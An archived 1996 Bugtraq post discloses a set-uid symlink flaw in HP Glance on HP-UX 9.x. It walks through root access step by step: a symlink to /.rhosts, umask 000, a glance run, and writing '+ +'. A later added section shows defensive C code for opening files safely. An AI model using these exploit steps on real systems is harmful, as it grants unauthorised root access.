[3385] in bugtraq


Vulnerability in HP Glance?

daemon@ATHENA.MIT.EDU (John W. Jacobi)
Tue Sep 24 18:07:31 1996

Date: 	Mon, 23 Sep 1996 00:07:03 -0700
Reply-To: jjacobi@NOVA.UMUC.EDU
From: "John W. Jacobi" <jjacobi@NOVA.UMUC.EDU>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>

Hi again,

If this is out or old, I apologize.

Platform I exploited: HP 9000/700/HPUX9.05 & HP9000/800/HPUX9.04

Product I exploited: HP Glance version B.09.04

What I gained: root access in under a minute without the root password.

Subject: Creating a file as root, with world write permissions using HP
Glance, while not being root, or truncating any file on the system.

Problem: You could create /.rhosts, /etc/hosts.equiv, or whatever else
your heart desires and then place arbitrary contents in it.  Perhaps in
the case of the r-command files a + + would suffice.  Or you could
truncate any file that root can.

Possible short term resolution: Remove the SUID-ROOT thing off of glance.

How I exploited to get quick root access:

1. I logged in as my regular account.
2. I checked for a root .rhosts file, it did not exist.
3. I made a sym link called /tmp/tempfile to root's would-be .rhosts file
like so:
        ln -s /.rhosts /tmp/tempfile
4. I set my umask to 000:
        umask 000
5. I ran glance with the following command line:
        glance -j 1 -f /tmp/tempfile -iterations 1
6. Thanks to glance the /.rhosts file suddenly appeared and was mode 666,
sweet.
7. Next I typed (I could have vi'ed or something as well):
        echo "+ +" > /.rhosts
8. Then:
        rlogin localhost -l root
9. And, not surprisingly, I was logged in as root.

Of course a little C program would be nice to automate this, but what if
the C compiler is not installed?  You might still want to be root,
wouldn't you???

Question:  Since there seem to be many of these little beasties in HP-UX,
does anyone know if the problem is of a single source, or just a lot of
vulnerable programs.

Any feedback would be greatly appreciated...

John W. Jacobi
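
The report above comes down to a set-uid root program creating its -f output file with root's permissions, through a symlink and under the caller's umask. As an added example (not part of the original post and not HP's code), this is how a set-uid program on a current POSIX system can open such a file safely; open_user_output and symlink_is_refused are hypothetical names, and the demo paths are constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not HP's code): open a user-named output file from
 * a set-uid program without lending the caller root's file permissions. */
int open_user_output(const char *path)
{
    uid_t privileged = geteuid();
    int fd;
    if (seteuid(getuid()) != 0)          /* act as the invoking user */
        return -1;
    /* O_EXCL|O_NOFOLLOW: never write through a pre-planted symlink or onto
     * an existing file. Mode 0600: umask can only clear bits, so umask 000
     * cannot widen it to 0666. */
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (seteuid(privileged) != 0) {      /* regain privilege for later work */
        if (fd >= 0) close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: a symlink planted where the output file will go.
 * Returns 0 if the link is refused and its target is never created. */
int symlink_is_refused(const char *dir)
{
    char lnk[512], target[512];
    struct stat st;
    snprintf(lnk, sizeof lnk, "%s/tempfile", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, lnk) != 0)
        return -1;
    umask(000);                          /* the caller's permissive umask */
    if (open_user_output(lnk) >= 0)
        return 1;                        /* link was followed or replaced */
    return lstat(target, &st) == 0 ? 2 : 0;
}

int main(void)
{
    char dir[] = "/tmp/outdemoXXXXXX";   /* constructed scratch directory */
    if (!mkdtemp(dir)) return 1;
    printf("symlink refused: %s\n", symlink_is_refused(dir) == 0 ? "yes" : "NO");
    return 0;
}
```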
